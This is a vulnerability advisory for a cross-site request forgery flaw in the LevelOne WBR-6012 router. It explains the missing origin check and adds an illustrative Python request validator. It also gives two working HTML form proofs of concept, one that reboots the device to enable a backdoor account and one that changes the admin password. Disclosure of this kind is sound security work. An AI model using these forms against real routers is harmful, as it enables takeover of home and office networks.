Talos Vulnerability Report

TALOS-2024-1981

LevelOne WBR-6012 Web Application cross-site request forgery (CSRF) vulnerability

October 30, 2024
CVE Number

CVE-2024-24777

SUMMARY

A cross-site request forgery (CSRF) vulnerability exists in the Web Application functionality of the LevelOne WBR-6012 R0.40e6. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious web page to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6012 R0.40e6

PRODUCT URLS

WBR-6012 - https://us.level1.com/products/wbr-6012

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

DETAILS

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

The LevelOne WBR-6012 router’s web application has a CSRF vulnerability that permits attackers to execute unauthorized actions without the user’s knowledge because it lacks proper origin enforcement, allowing external websites to make requests as if they were the user. There does not appear to be any logic within the device’s firmware which checks the origin of HTTP requests.
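The following is added here to illustrate the server-side check the advisory says the firmware lacks; it is not the device's code or Talos's code. It gates the two endpoints used in the proofs of concept below by requiring POST, a matching Origin (or Referer) header, and a per-session anti-CSRF token. The device origin and endpoint paths come from this advisory; the token scheme, the headers inspected and the sample requests are assumptions constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

DEVICE_ORIGIN = "http://192.168.1.1"                 # the router's own origin (from the PoCs)
STATE_CHANGING = {"/cgi-bin/rebo", "/cgi-bin/pass"}  # endpoints used in the PoCs


def new_csrf_token() -> str:
    """Per-session secret the admin UI would embed in its forms (assumed design)."""
    return secrets.token_urlsafe(32)


def _origin_of(headers: dict):
    """Return scheme://host[:port] of the requesting page from Origin, else Referer."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return None
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}"


def check_request(method: str, path: str, headers: dict, form: dict, session_token: str):
    """Decide whether a state-changing request may proceed. Returns (allowed, reason)."""
    if path not in STATE_CHANGING:
        return True, "not a state-changing endpoint"
    # 1. A reboot or password change must not be reachable via GET: a plain link or
    #    <img> tag from any page would otherwise trigger it.
    if method.upper() != "POST":
        return False, "state change requires POST"
    # 2. Origin enforcement: the request must come from the device's own pages.
    origin = _origin_of(headers)
    if origin != DEVICE_ORIGIN:
        return False, f"origin {origin!r} is not {DEVICE_ORIGIN}"
    # 3. Session-bound anti-CSRF token, compared in constant time.
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session_token.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    tok = new_csrf_token()
    # Constructed: the advisory's password-change PoC submitted from a page hosted elsewhere.
    print(check_request("POST", "/cgi-bin/pass", {"Origin": "http://cross-site.example"},
                        {"test": "test", "Pa": "test"}, tok))
    # Constructed: the same change made from the device's own admin page with a valid token.
    print(check_request("POST", "/cgi-bin/pass", {"Referer": "http://192.168.1.1/admin.html"},
                        {"Pa": "test", "csrf_token": tok}, tok))
```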

Exploit Proof of Concept

The two proofs of concept below demonstrate leveraging the Cross Site Request Forgery (CSRF) vulnerability in conjunction with two other vulnerabilities to 1) reboot the device to enable the backdoor account (TALOS-2024-XXXX) and 2) change the admin’s password without knowing the existing password (TALOS-2024-XXXX).

Reboot the Device (enable the backdoor, TALOS-2024-1979)

<html>
<form enctype="application/x-www-form-urlencoded" method="GET" action="http://192.168.1.1/cgi-bin/rebo">
    <table>
        <tr>
            <td></td>
            <td><input type="text" value="undefined" name=""></td>
        </tr>
    </table><input type="submit" value="submit">
</form>

</html>

Change the Password (without knowledge of the existing password, TALOS-2024-1984)

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://192.168.1.1/cgi-bin/pass">
    <table>
        <tr>
            <td>dummy param</td>
            <td><input type="text" value="test" name="test"></td>
        </tr>
        <tr>
            <td>new pw</td>
            <td><input type="text" value="test" name="Pa"></td>
        </tr>
    </table><input type="submit" value="http://192.168.1.1/cgi-bin/pass">
</form>

</html>

TIMELINE

2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.